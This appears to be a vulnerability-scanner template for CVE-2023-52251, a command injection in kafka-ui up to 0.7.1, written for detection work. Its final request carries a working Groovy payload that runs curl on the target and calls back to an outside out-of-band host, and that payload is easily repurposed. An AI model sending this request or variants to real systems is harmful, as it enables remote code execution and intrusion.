id: CVE-2023-52251 info: name: Kafka UI 0.7.1 Command Injection author: yhy0,iamnoooob severity: high description: | An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. reference: - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html - https://github.com/BobTheShoplifter/CVE-2023-52251-POC - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-52251 cwe-id: CWE-94 epss-score: 0.03218 epss-percentile: 0.91206 cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:* metadata: verified: true max-request: 3 vendor: provectus product: ui framework: kafka fofa-query: icon_hash="-1477045616" tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm http: - raw: - | GET /api/clusters HTTP/1.1 Host: {{Hostname}} extractors: - type: json name: cluster-name internal: true json: - '.[0].name' - raw: - | GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1 Host: {{Hostname}} extractors: - type: json name: topic-name internal: true json: - '.topics[].name' - raw: - | @timeout 20s GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: body words: - 'Assigning partitions' # digest: 4b0a0048304602210090dcbdf999787073e347b90236896f106cca2b7ba465b80d3e338f35b1e50d8802210088f1ccf1eab30ea3f481aec5b0721a90153b605601fe3212d5ac1c7406f9f858:922c64590222798bb761d5b6d8e72950